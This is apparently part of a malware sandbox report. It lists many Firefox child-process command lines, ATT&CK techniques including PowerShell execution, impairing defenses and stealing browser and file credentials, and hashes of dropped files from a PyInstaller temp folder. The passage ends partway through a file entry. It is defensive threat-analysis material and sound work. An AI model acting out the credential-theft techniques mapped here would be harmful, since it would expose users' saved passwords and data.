    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9132 -childID 24 -isForBrowser -prefsHandle 9144 -prefMapHandle 9088 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3590cfba-411b-477c-aa6b-8e856b208ec8} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:848
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9296 -childID 25 -isForBrowser -prefsHandle 9304 -prefMapHandle 9308 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1d727504-846d-46bf-abdd-b3bfc9ac16a2} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:3500
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9476 -childID 26 -isForBrowser -prefsHandle 9520 -prefMapHandle 9528 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {452adf78-2ac2-47ad-a9ed-ba0db9a35bd2} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:3488
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9780 -childID 27 -isForBrowser -prefsHandle 9788 -prefMapHandle 9792 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {93bdb12b-52fe-415b-b5e1-9be2599b5a2b} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:4084
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9972 -childID 28 -isForBrowser -prefsHandle 9980 -prefMapHandle 9984 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8cb188f3-c9d7-419e-b48a-65c185e6b6f7} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:3656
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10188 -childID 29 -isForBrowser -prefsHandle 10196 -prefMapHandle 10200 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eccf2d7b-4f74-4c1f-a65b-82ea808ee111} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:1756
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10488 -childID 30 -isForBrowser -prefsHandle 10480 -prefMapHandle 10476 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5319e16a-b1aa-4de3-a435-07f13296a451} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:4668
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10624 -childID 31 -isForBrowser -prefsHandle 10388 -prefMapHandle 10392 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c34c979-7712-499e-9580-de0b29d5a49c} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:4964
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10792 -childID 32 -isForBrowser -prefsHandle 10796 -prefMapHandle 10800 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3b06e2d-e20c-465a-975e-cd47aecafc37} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:2672
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10964 -childID 33 -isForBrowser -prefsHandle 11008 -prefMapHandle 11016 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a94ff34-b386-4862-9338-c638701f167e} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:2456
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11208 -childID 34 -isForBrowser -prefsHandle 11216 -prefMapHandle 11220 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b02c6768-7bea-4202-a13d-60cec97162bd} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:4368
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11428 -childID 35 -isForBrowser -prefsHandle 11504 -prefMapHandle 11500 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a111678a-eab1-40cc-96c4-08df0df24860} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:4508
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11648 -childID 36 -isForBrowser -prefsHandle 11660 -prefMapHandle 11604 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec70b4d8-b83a-479e-9470-8e0c5c4a2d2c} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:1724
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7144 -childID 37 -isForBrowser -prefsHandle 9844 -prefMapHandle 9848 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c5ce1694-b0ed-4117-971a-d5bde311e5c9} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:4832
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7104 -childID 38 -isForBrowser -prefsHandle 8592 -prefMapHandle 9480 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20f1f9be-b306-4c1c-baf3-2b013df198f1} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:4344
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7680 -childID 39 -isForBrowser -prefsHandle 7124 -prefMapHandle 7120 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97c7c6af-4d4c-4661-b637-2963204ee539} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:4488
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7696 -childID 40 -isForBrowser -prefsHandle 8088 -prefMapHandle 8084 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {566cc76f-df1f-4e26-9893-460ac9115adc} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:1876
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6024 -childID 41 -isForBrowser -prefsHandle 6460 -prefMapHandle 5836 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {979258cc-b4e1-453f-b537-28c549e17eac} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:3840
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7648 -childID 42 -isForBrowser -prefsHandle 12144 -prefMapHandle 12148 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4568714-5519-4433-a5e5-95b2f6882736} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:4216
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11012 -childID 43 -isForBrowser -prefsHandle 10460 -prefMapHandle 10796 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b85002a2-cbf0-4145-9640-5842905491db} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5168
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11064 -childID 44 -isForBrowser -prefsHandle 10452 -prefMapHandle 10456 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {63e5e2c7-a37a-4efa-8985-6fe69a24efc2} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5184
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9096 -childID 45 -isForBrowser -prefsHandle 9176 -prefMapHandle 11064 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2567a45e-30f5-4a2e-bd86-d2dd850a8cd8} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5196
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8928 -childID 46 -isForBrowser -prefsHandle 10200 -prefMapHandle 10416 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e8747b8-a397-4fd6-a1bb-cdc9533ae4fa} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:4008
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5704 -childID 47 -isForBrowser -prefsHandle 11684 -prefMapHandle 11680 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {304ea9b2-a548-4085-aa80-dbc6acf1382e} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:1152
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5712 -childID 48 -isForBrowser -prefsHandle 11696 -prefMapHandle 11692 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d649e181-fa95-4edf-89bc-80b78c3dae53} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5332
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12436 -childID 49 -isForBrowser -prefsHandle 12692 -prefMapHandle 12688 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bb7448d3-77cf-4a00-bffd-c8e237aac496} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5644
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12348 -childID 50 -isForBrowser -prefsHandle 12704 -prefMapHandle 12700 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b54f5082-c124-4c65-9fa1-d5d7b05d3d47} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5540
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13060 -childID 51 -isForBrowser -prefsHandle 12948 -prefMapHandle 12956 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9af60ef4-41f6-42dc-afe9-d5fc7b5963ab} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5760
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13052 -childID 52 -isForBrowser -prefsHandle 12920 -prefMapHandle 12940 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6210d96-4d5c-48a2-af37-847598f41565} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5768
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13316 -childID 53 -isForBrowser -prefsHandle 13200 -prefMapHandle 13060 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5663788f-aed8-493b-b7a8-0224668ddb6a} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5784
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13472 -childID 54 -isForBrowser -prefsHandle 13324 -prefMapHandle 13320 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c1eabb0-dd43-4ca6-9f83-222163d4d65a} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5788
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13700 -childID 55 -isForBrowser -prefsHandle 13592 -prefMapHandle 13316 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {996ab9b7-bb0d-4155-a9d5-90184cdf859d} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5812
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13720 -childID 56 -isForBrowser -prefsHandle 13708 -prefMapHandle 13704 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {67e93e2a-7705-4a7f-8c29-906e91d021af} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5840
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14088 -childID 57 -isForBrowser -prefsHandle 14072 -prefMapHandle 13984 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb2d71e2-542a-4375-ad4f-76fe57dfa5e5} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5856
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14104 -childID 58 -isForBrowser -prefsHandle 14092 -prefMapHandle 14084 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7abf136-1f03-427e-8d5e-5a980332e4e2} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5868
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14476 -childID 59 -isForBrowser -prefsHandle 14460 -prefMapHandle 14372 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9057e2bd-6711-44f4-863b-7a8095dbcb45} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5900
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14492 -childID 60 -isForBrowser -prefsHandle 14480 -prefMapHandle 14468 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0897adc4-9ff2-4066-bfe3-f2bef9b087a1} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5932
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14884 -childID 61 -isForBrowser -prefsHandle 14984 -prefMapHandle 14988 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4ee5340-efe8-4741-89bd-5c7d7f8eac35} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5972
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14872 -childID 62 -isForBrowser -prefsHandle 14972 -prefMapHandle 14976 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb7268cf-f187-4fab-ae12-63f5cb9cdd4e} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:2140
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15296 -childID 63 -isForBrowser -prefsHandle 15276 -prefMapHandle 15272 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91b92f02-c805-400b-ba57-27d10be45bb1} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:3344
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14848 -childID 64 -isForBrowser -prefsHandle 14744 -prefMapHandle 14476 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {44e71ad0-3cb3-46fa-bb6a-4b8fa4819768} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:4840
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15644 -childID 65 -isForBrowser -prefsHandle 15792 -prefMapHandle 15788 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {707cf2eb-6ec4-40c2-a717-01026fa50a6f} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:6024
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15652 -childID 66 -isForBrowser -prefsHandle 15804 -prefMapHandle 15800 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e28cdc2-8011-42f0-ba5e-07ee78dc5043} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5228

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
83d94e8aa23c7ad2db6f972739506306

SHA1
bd6d73d0417971c0077f772352d2f538a6201024

SHA256
dfa5cbd243b304f47196c492bc2d8b29941a550c2f076ef8bdfca72755e71881

SHA512
4224625e8ef8dadc72f1e1a1edfe2079656b14f2af94ce6128316481d96e9d0b6edf4de13fcdcc182038a2b29eb562b9246f944aecebfcb7c5ee8d7936b6287e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
667858a096eca31dca10454aff8d6054

SHA1
f9e8bc4c4e64105b1af64ed138f38de3b51ff815

SHA256
3a11d7979d8f0384ad99ed91bbc2a51d75ae33e34149576cda5160a97e6cc117

SHA512
ca9684042a3f403a40c67f852d0bd41393b1ef3d31924a19e407d6bbef8b280fd12d5a86e546a8aa61f4119c2fd2fa6d099d9a297bd972f64cf9fd4a0775becc

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\dly1kncb.default-release\activity-stream.discovery_stream.json.tmp

Filesize
19KB

MD5
35f9137734c014e8334742821f90768e

SHA1
a4a688293fc02245f70a7c0a0ff8ebb3bcac98db

SHA256
2d97f38dabe023378063c9f570bb36651407ba7d90c98ed9789a1c1e72a957e1

SHA512
bb10169941f59fbe69203dc1ba762827b266c6227415996e8a0e75a24e93bbf53c6dfc99708022d593493f01ae38f35ec0b97fc6f60860c32d2db87046d0a320

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50402\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50402\_bz2.pyd

Filesize
46KB

MD5
0c13627f114f346604b0e8cbc03baf29

SHA1
bf77611d924df2c80aabcc3f70520d78408587a2

SHA256
df1e666b55aae6ede59ef672d173bd0d64ef3e824a64918e081082b8626a5861

SHA512
c97fa0f0988581eae5194bd6111c1d9c0e5b1411bab47df5aa7c39aad69bfbeca383514d6aaa45439bb46eacf6552d7b7ed08876b5e6864c8507eaa0a72d4334

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50402\_ctypes.pyd

Filesize
57KB

MD5
38fb83bd4febed211bd25e19e1cae555

SHA1
4541df6b69d0d52687edb12a878ae2cd44f82db6

SHA256
cd31af70cbcfe81b01a75ebeb2de86079f4cbe767b75c3b5799ef8b9f0392d65

SHA512
f703b231b675c45accb1f05cd34319b5b3b7583d85bf2d54194f9e7c704fbcd82ef2a2cd286e6a50234f02c43616fbeccfd635aefd73424c1834f5dca52c0931

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50402\_decimal.pyd

Filesize
104KB

MD5
7ba541defe3739a888be466c999c9787

SHA1
ad0a4df9523eeeafc1e67b0e4e3d7a6cf9c4dfac

SHA256
f90efa10d90d940cde48aafe02c13a0fc0a1f0be7f3714856b7a1435f5decf29

SHA512
9194a527a17a505d049161935432fa25ba154e1aee6306dee9054071f249c891f0ca7839de3a21d09b57fdc3f29ee7c4f08237b0dfffafa8f0078cfe464bed3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50402\_hashlib.pyd

Filesize
33KB

MD5
596df8ada4b8bc4ae2c2e5bbb41a6c2e

SHA1
e814c2e2e874961a18d420c49d34b03c2b87d068

SHA256
54348cfbf95fd818d74014c16343d9134282d2cf238329eec2cda1e2591565ec

SHA512
e16aad5230e4af7437b19c3db373b1a0a0a84576b608b34430cced04ffc652c6fb5d8a1fe1d49ac623d8ae94c8735800c6b0a12c531dcdd012b05b5fd61dff2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50402\_lzma.pyd

Filesize
84KB

MD5
8d9e1bb65a192c8446155a723c23d4c5

SHA1
ea02b1bf175b7ef89ba092720b3daa0c11bef0f0

SHA256
1549fe64b710818950aa9bf45d43fe278ce59f3b87b3497d2106ff793efa6cf7

SHA512
4d67306fe8334f772fe9d463cb4f874a8b56d1a4ad3825cff53cae4e22fa3e1adba982f4ea24785312b73d84a52d224dfb4577c1132613aa3ae050a990e4abdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50402\_queue.pyd

Filesize
24KB

MD5
fbbbfbcdcf0a7c1611e27f4b3b71079e

SHA1
56888df9701f9faa86c03168adcd269192887b7b

SHA256
699c1f0f0387511ef543c0df7ef81a13a1cffde4ce4cd43a1baf47a893b99163

SHA512
0a5ba701653ce9755048ae7b0395a15fbb35509bef7c4b4fe7f11dc4934f3bd298bcddbf2a05b61f75f8eb44c4c41b3616f07f9944e0620b031cbe87a7443284

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50402\_socket.pyd

Filesize
41KB

MD5
4351d7086e5221398b5b78906f4e84ac

SHA1
ba515a14ec1b076a6a3eab900df57f4f37be104d

SHA256
a0fa25eef91825797f01754b7d7cf5106e355cf21322e926632f90af01280abe

SHA512
a1bcf51e797ccae58a0b4cfe83546e5e11f8fc011ca3568578c42e20bd7a367a5e1fa4237fb57aa84936eec635337e457a61a2a4d6eca3e90e6dde18ae808025

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50402\_sqlite3.pyd

Filesize
54KB

MD5
d678600c8af1eeeaa5d8c1d668190608

SHA1
080404040afc8b6e5206729dd2b9ee7cf2cb70bc

SHA256
d6960f4426c09a12488eb457e62506c49a58d62a1cb16fbc3ae66b260453c2ed

SHA512
